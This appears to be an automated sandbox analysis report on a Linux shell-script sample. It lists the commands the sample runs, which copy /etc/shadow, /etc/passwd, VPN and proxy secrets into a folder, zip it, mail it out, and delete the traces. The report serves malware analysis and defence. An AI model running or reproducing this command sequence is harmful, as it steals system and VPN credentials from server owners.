Technical Information
Malicious functions:
Gains root privileges
Launches processes:
- /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
- <SAMPLE_FULL_PATH>
- /bin/bash <SAMPLE_FULL_PATH> -c
- wget -qO- ipinfo.io/ip
- clear
- date +%Y-%m-%d
- sleep 1
- mkdir /root/backup
- cp /etc/passwd backup/
- cp /etc/group backup/
- cp /etc/shadow backup/
- cp /etc/gshadow backup/
- cp -r /etc/wireguard backup/wireguard
- cp /etc/ppp/chap-secrets backup/chap-secrets
- cp /etc/ipsec.d/passwd backup/passwd1
- cp /etc/shadowsocks-libev/akun.conf backup/ss.conf
- cp -r /var/lib/premium-script/ backup/premium-script
- cp -r /home/sstp backup/sstp
- cp -r /etc/v2ray backup/v2ray
- cp -r /etc/trojan backup/trojan
- cp -r /usr/local/shadowsocksr/ backup/shadowsocksr
- cp -r /home/vps/public_html backup/public_html
- zip -r 95.211.190.198-2021-07-29.zip backup
- grep ^https
- cut -d= -f2
- mail -s Backup Data
- rm -rf /root/backup
- rm -r /root/95.211.190.198-2021-07-29.zip
Performs operations with the file system:
Modifies file access rights:
- /root/95.211.190.198-2021-07-29.zip
Creates folders:
- /root/backup
Creates or modifies files:
- /root/backup/passwd
- /root/backup/group
- /root/backup/shadow
- /root/backup/gshadow
- /root/95.211.190.198-2021-07-29.zip
- /root/ziHuMskh
Deletes files:
- /root/95.211.190.198-2021-07-29.zip
- /root/passwd
- /root/shadow
- /root/group
- /root/gshadow
Network activity:
Establishes connection:
- <LOCAL_DNS_SERVER>
HTTP GET requests:
- ip###o.io/ip
DNS ASK:
- ip##fo.io
Other:
Collects RAM information